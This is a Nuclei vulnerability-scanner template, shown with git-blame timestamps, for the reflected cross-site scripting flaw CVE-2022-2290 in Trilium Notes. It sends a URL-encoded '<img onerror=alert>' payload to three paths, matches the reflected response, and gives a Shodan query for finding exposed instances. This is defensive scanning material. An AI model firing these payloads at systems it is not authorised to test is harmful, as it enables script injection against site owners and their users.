nuclei-templates/cves/2022/CVE-2022-2290.yaml

41 lines
1.1 KiB
YAML
Raw Normal View History

2022-07-05 19:53:31 +00:00
id: CVE-2022-2290
info:
2022-07-06 05:01:04 +00:00
name: Trilium - Cross-Site Scripting
2022-07-05 19:53:31 +00:00
author: dbrwsky
severity: medium
description: Cross-site Scripting (XSS) - Reflected in GitHub repository zadam/trilium prior to 0.52.4, 0.53.1-beta.
reference:
- https://huntr.dev/bounties/367c5c8d-ad6f-46be-8503-06648ecf09cf/
- https://github.com/zadam/trilium
2022-07-06 05:01:04 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-2290
2022-07-06 05:07:04 +00:00
metadata:
verified: true
shodan-query: title:"Trilium Notes"
2022-07-06 05:01:04 +00:00
tags: cve,cve2022,xss,trilium
2022-07-05 19:53:31 +00:00
requests:
- method: GET
path:
2022-07-06 05:10:04 +00:00
- '{{BaseURL}}/custom/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
- '{{BaseURL}}/share/api/notes/%3Cimg%20src=x%20onerror=alert(document.domain)%3E'
- '{{BaseURL}}/share/api/images/%3Cimg%20src=x%20onerror=alert(document.domain)%3E/filename'
2022-07-05 19:53:31 +00:00
2022-07-06 05:01:04 +00:00
stop-at-first-match: true
2022-07-05 19:53:31 +00:00
matchers-condition: and
matchers:
2022-07-06 05:01:04 +00:00
2022-07-05 19:53:31 +00:00
- type: word
part: body
2022-07-06 05:10:04 +00:00
words:
- 'No handler matched for custom <img src=x onerror=alert(document.domain)>'
2022-07-06 05:01:04 +00:00
2022-07-05 19:53:31 +00:00
- type: word
2022-07-06 05:10:04 +00:00
part: header
2022-07-05 19:53:31 +00:00
words:
- "text/html"
2022-07-06 05:01:04 +00:00
- type: status
status:
- 404